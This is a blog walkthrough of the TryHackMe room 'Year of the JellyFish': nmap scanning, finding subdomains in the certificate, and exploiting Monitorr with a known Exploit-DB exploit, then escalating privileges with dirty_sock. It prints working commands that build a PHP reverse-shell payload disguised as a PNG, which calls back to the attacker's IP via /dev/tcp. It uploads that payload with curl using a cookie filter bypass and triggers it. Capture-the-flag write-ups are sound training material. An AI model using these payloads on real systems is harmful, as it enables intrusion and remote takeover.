Year Of JellyFish TryHackme

 Year Of JellyFish TryHackme Walkthrough

 

 

Nmap Scan

 Nmap scan report for ec2-54-154-149-95.eu-west-1.compute.amazonaws.com (54.154.149.95)  
 Host is up (0.21s latency).  
 Not shown: 995 filtered ports  
 PORT   STATE SERVICE VERSION  
 21/tcp  open ftp   vsftpd 3.0.3  
 22/tcp  open ssh   OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)  
 | ssh-hostkey:   
 |_ 2048 46:b2:81:be:e0:bc:a7:86:39:39:82:5b:bf:e5:65:58 (RSA)  
 80/tcp  open http   Apache httpd 2.4.29  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 |_http-server-header: Apache/2.4.29 (Ubuntu)  
 |_http-title: Did not follow redirect to https://robyns-petshop.thm/  
 443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))  
 | http-methods:   
 |_ Supported Methods: GET HEAD POST OPTIONS  
 |_http-server-header: Apache/2.4.29 (Ubuntu)  
 |_http-title: Robyn's Pet Shop  
 | ssl-cert: Subject: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB  
 | Subject Alternative Name: DNS:robyns-petshop.thm, DNS:monitorr.robyns-petshop.thm, DNS:beta.robyns-petshop.thm, DNS:dev.robyns-petshop.thm  
 | Issuer: commonName=robyns-petshop.thm/organizationName=Robyns Petshop/stateOrProvinceName=South West/countryName=GB  
 | Public Key type: rsa  
 | Public Key bits: 2048  
 | Signature Algorithm: sha256WithRSAEncryption  
 | Not valid before: 2021-04-25T12:55:33  
 | Not valid after: 2022-04-25T12:55:33  
 | MD5:  5e00 d923 e57a 0805 8112 1ba9 3492 fcc5  
 |_SHA-1: 7038 42c1 5c02 fa73 3064 ac31 fd42 1443 50e3 68fe  
 |_ssl-date: TLS randomness does not represent time  
 | tls-alpn:   
 |_ http/1.1  
 8000/tcp open http-alt  
 | fingerprint-strings:   
 |  GenericLines:   
 |   HTTP/1.1 400 Bad Request  
 |   Content-Length: 15  
 |_  Request  
 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :  
 SF-Port8000-TCP:V=7.91%I=7%D=4/25%Time=6085673A%P=x86_64-pc-linux-gnu%r(Ge  
 SF:nericLines,3F,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Length:\x2  
 SF:015\r\n\r\n400\x20Bad\x20Request");  
 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port  
 OS fingerprint not ideal because: Missing a closed TCP port so results incomplete  
 No OS matches for host  
 Uptime guess: 23.288 days (since Fri Apr 2 11:32:36 2021)  
 TCP Sequence Prediction: Difficulty=264 (Good luck!)  
 IP ID Sequence Generation: All zeros  
 Service Info: Host: robyns-petshop.thm; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel  



Enumeration

if you see the nmap result or you can visit the certificate you can find these

subdomains,,




robyns-petshop.thm

monitorr.robyns-petshop.thm

beta.robyns-petshop.thm

dev.robyns-petshop.thm


Then add your /etc/hosts 









robyns-petshop.thm
 
 
 







pico from github? okkk



monitorr.robyns-petshop.thm
 
 
 
 
monitorr.robyns-petshop.thm
 



https://www.exploit-db.com/exploits/48980
 
 
 Sounds Good :)
 
 
 
 
 
but this exploit not work, after analyzing this exploit, i found how it works its pretty simple
  
then iam upload our shell via curl(gif format to bypass waf(filter) mentioned in exploit-db) first time its not work after i see the cookie editor this site have 
 
cookie value(isHuman=1) then iam mentioned cookie value in curl and  uploaded shell(php-shell-with-gif-magic-number) i get back reverse connection
 
 
if you not understand this exploit Read https://www.exploit-db.com/exploits/48980 this simple python code  
 
 
 
 
 
 
 
COMMANDS TO GET INITIAL SHELL

 
 
echo -e $'\x89\x50\x4e\x47\x0d\x0a\x1a\n<?php echo system("bash -c \'bash -i >& /dev/tcp/10.9.20.61/80 0>&1\'");' > shell.png.pHp

curl -k -F "fileToUpload=@./shell.png.pHp" https://monitorr.robyns-petshop.thm/assets/php/upload.php -H "Cookie: isHuman=1"  

curl -k https://monitorr.robyns-petshop.thm/assets/data/usrimg/shell.png.php  

 

 

initial shell

FLAG1.TXT



PRIVILLEGED ESCALATION


iam always using linpeas/linenum for privilleged escalation but this time i'm not get any interesting output i found some hashes but its not useful


so i use linux exploit suggester https://github.com/mzet-/linux-exploit-suggester

i run this script it found lot of exploits, i tried dirty-sock! Few weeks ago i'm also did dirty-sock 

privelleged exploit on htb i don't know machine name if you know the machine name comment below  :)


Download Dirty-sock exploit

wget https://github.com/initstring/dirty_sock/archive/master.zip



Run this exploit


Now its look like Easy machine But its have lot of rabbit holes 


Don't TryHarder!

       Enumerate Harder!!

Understand The Exploit thats matter :)

5 تعليقات

إرسال تعليق

أحدث أقدم

Smartphones

Post ADS 1

Advertisement

Post ADS 1